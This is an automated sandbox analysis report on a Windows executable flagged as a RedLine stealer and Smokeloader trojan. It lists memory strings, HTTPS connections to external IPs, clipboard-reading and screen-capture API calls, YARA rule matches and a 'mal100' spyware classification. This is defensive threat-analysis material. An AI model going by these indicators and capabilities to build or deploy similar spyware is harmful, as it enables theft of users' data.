                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199960919.00000000008FF000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199904088.0000000000995000.00000004.00000020.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2293981905.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2293981905.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2270340473.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246176841.0000000003064000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246499324.0000000003065000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2246052766.000000000307B000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2270388935.0000000003065000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2293872198.0000000003060000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2293981905.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2293981905.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2293981905.0000000003501000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2221140638.0000000003036000.00000004.00000800.00020000.00000000.sdmp, 5Z19n7XRT1.exe, 00000000.00000003.2199943791.0000000003031000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                    Source: 5Z19n7XRT1.exe, 00000000.00000003.2199904088.000000000098C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknownHTTPS traffic detected: 23.55.153.106:443 -> 192.168.2.6:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49722 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.21.66.86:443 -> 192.168.2.6:49728 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.6:49737 version: TLS 1.2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004310D0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004310D0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,0_2_004310D0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00431839 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,0_2_00431839

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 00000000.00000002.2390625549.00000000008B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004210E00_2_004210E0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004361E00_2_004361E0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004152980_2_00415298
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0040B44C0_2_0040B44C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004087900_2_00408790
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004260540_2_00426054
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0043B0680_2_0043B068
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004140700_2_00414070
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0043C0200_2_0043C020
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004398300_2_00439830
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0043D8300_2_0043D830
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0041B0E10_2_0041B0E1
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0041F0E00_2_0041F0E0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004358900_2_00435890
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004340980_2_00434098
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0043D0A00_2_0043D0A0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004180A90_2_004180A9
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0040A9400_2_0040A940
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0041714B0_2_0041714B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0040C9170_2_0040C917
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0042B12C0_2_0042B12C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0042F1300_2_0042F130
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0042B1C00_2_0042B1C0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0041D9E00_2_0041D9E0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004111E50_2_004111E5
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004059F00_2_004059F0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004239F20_2_004239F2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0043C1F00_2_0043C1F0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0040F9FD0_2_0040F9FD
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004259900_2_00425990
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0043B9A10_2_0043B9A1
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004062500_2_00406250
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0041D2700_2_0041D270
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00424A740_2_00424A74
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004092300_2_00409230
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00423A340_2_00423A34
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004192DA0_2_004192DA
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0043D2F00_2_0043D2F0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0043C2800_2_0043C280
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004082AE0_2_004082AE
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004252BA0_2_004252BA
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0041CB050_2_0041CB05
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00428BC00_2_00428BC0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004143C20_2_004143C2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00402BD00_2_00402BD0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00428BE90_2_00428BE9
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004373990_2_00437399
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004393A00_2_004393A0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00416BA50_2_00416BA5
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004293AA0_2_004293AA
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004223B80_2_004223B8
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00436C000_2_00436C00
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004234100_2_00423410
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0042B4FC0_2_0042B4FC
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00404CB00_2_00404CB0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004074B00_2_004074B0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0041DD500_2_0041DD50
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004185780_2_00418578
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0042D57E0_2_0042D57E
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004245020_2_00424502
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00421D100_2_00421D10
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0040DD250_2_0040DD25
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0041D5E00_2_0041D5E0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004175820_2_00417582
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0043D5800_2_0043D580
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00427DA20_2_00427DA2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004205B00_2_004205B0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0042C64A0_2_0042C64A
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00426E500_2_00426E50
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0042B4F70_2_0042B4F7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0043462A0_2_0043462A
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004356300_2_00435630
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004066E00_2_004066E0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0042C6E40_2_0042C6E4
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00430EF00_2_00430EF0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004256F90_2_004256F9
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00422E930_2_00422E93
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00425E900_2_00425E90
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004156A00_2_004156A0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0041BEA00_2_0041BEA0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00438EA00_2_00438EA0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00435EA00_2_00435EA0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00405EB00_2_00405EB0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0041C6BB0_2_0041C6BB
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00415F660_2_00415F66
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004197700_2_00419770
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_004097000_2_00409700
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0042C7260_2_0042C726
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0042C7350_2_0042C735
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0041DF800_2_0041DF80
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_00402FA00_2_00402FA0
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024932070_2_02493207
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024CB2CF0_2_024CB2CF
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024C42FF0_2_024C42FF
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024A734A0_2_024A734A
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024AB3480_2_024AB348
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024B13470_2_024B1347
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024AF3470_2_024AF347
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024CD3070_2_024CD307
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024983C70_2_024983C7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024BB3930_2_024BB393
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024BF3970_2_024BF397
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024A73B20_2_024A73B2
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024B80090_2_024B8009
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0249C0E80_2_0249C0E8
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024C11570_2_024C1157
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024B81080_2_024B8108
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024C91070_2_024C9107
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024C61070_2_024C6107
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024961170_2_02496117
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024AE1E70_2_024AE1E7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024AC1AC0_2_024AC1AC
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024C96070_2_024C9607
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024B96110_2_024B9611
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024BB7630_2_024BB763
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024977170_2_02497717
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024A87DF0_2_024A87DF
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024CD7E70_2_024CD7E7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024BD7E50_2_024BD7E5
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024A144C0_2_024A144C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024C64470_2_024C6447
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024BB4270_2_024BB427
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024AD4D70_2_024AD4D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024994970_2_02499497
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024964B70_2_024964B7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024A95410_2_024A9541
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024CD5570_2_024CD557
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024AC5280_2_024AC528
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024945D70_2_024945D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024C5AF70_2_024C5AF7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024CDA970_2_024CDA97
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024C9A970_2_024C9A97
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0249CB7E0_2_0249CB7E
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024B5BF70_2_024B5BF7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024A7BA70_2_024A7BA7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0249ABA70_2_0249ABA7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024AD8470_2_024AD847
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024BB75E0_2_024BB75E
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024B08170_2_024B0817
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024C58970_2_024C5897
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024C48910_2_024C4891
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024BC8B10_2_024BC8B1
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024BC94B0_2_024BC94B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024969470_2_02496947
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024999670_2_02499967
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024AC9210_2_024AC921
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024A99D70_2_024A99D7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024989F70_2_024989F7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024BC98D0_2_024BC98D
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024BC99C0_2_024BC99C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024C6E670_2_024C6E67
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_02492E370_2_02492E37
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024B1F770_2_024B1F77
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_02494F170_2_02494F17
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024A8F350_2_024A8F35
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0249DF8C0_2_0249DF8C
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024ADFB70_2_024ADFB7
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024ADC470_2_024ADC47
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_02495C570_2_02495C57
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_0249FC640_2_0249FC64
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024CBC080_2_024CBC08
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_02493C270_2_02493C27
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024B4CF40_2_024B4CF4
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_024B3C9B0_2_024B3C9B
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: String function: 024981D7 appears 78 times
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: String function: 00414060 appears 74 times
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: String function: 00407F70 appears 46 times
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: String function: 024A42C7 appears 74 times
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3524 -s 1880
                    Source: 5Z19n7XRT1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.2390625549.00000000008B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 5Z19n7XRT1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@11/3
                    Source: C:\Users\user\Desktop\5Z19n7XRT1.exeCode function: 0_2_008B977E CreateToolhelp32Snapshot,Module32First,0_2_008B977E
